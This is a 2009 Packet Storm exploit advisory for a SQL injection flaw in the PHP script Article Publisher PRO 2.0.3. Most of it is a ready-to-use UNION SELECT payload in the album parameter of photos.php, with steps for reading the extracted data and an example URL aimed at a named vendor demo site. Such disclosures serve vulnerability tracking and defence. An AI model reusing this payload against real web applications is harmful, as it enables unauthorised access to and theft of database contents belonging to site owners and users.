Article Publisher PRO 2.0.3 SQL Injection

2009-07-29T00:00:00
ID PACKETSTORM:79801
Type packetstorm
Reporter MizoZ
Modified 2009-07-29T00:00:00

Description

                                        
                                            `----------------------------------------------------------------------------------------------------  
  
Name : Article Publisher PRO v2.0.3  
Site : http://www.phpmodelagencyscript.com/<http://www.arctictracker.com/>  
Demo : http://model-agency-manager-pro.phpmodelagencyscript.com/<http://demo-article-publisher-pro.phparticlescript.com/>  
  
----------------------------------------------------------------------------------------------------  
  
Found By : MizoZ [EvilWay Team]  
Made in : Morocco  
Contact : mizoz[at]9[dot]cn  
Greetz : Moudi , Zuka , JIKO , opt!x , All friends  
Website : BlackArea.org (Coming Soon)  
  
----------------------------------------------------------------------------------------------------  
  
Vuln :  
*******  
[HOST]/[PATH]/photos.php?user_id=9&album=-22+union+select+version(),2,3,4,5,6--  
  
to see data , you have to copy the link of the Photo , you will have  
[HOST]/[PATH]/comments_view_photo.php?user_id=3&photo=[DATA]  
  
Exemples :  
http://model-agency-manager-pro.phpmodelagencyscript.com/photos.php?user_id=9&album=-22+union+select+version(),2,3,4,5,6--  
  
----------------------------------------------------------------------------------------------------  
`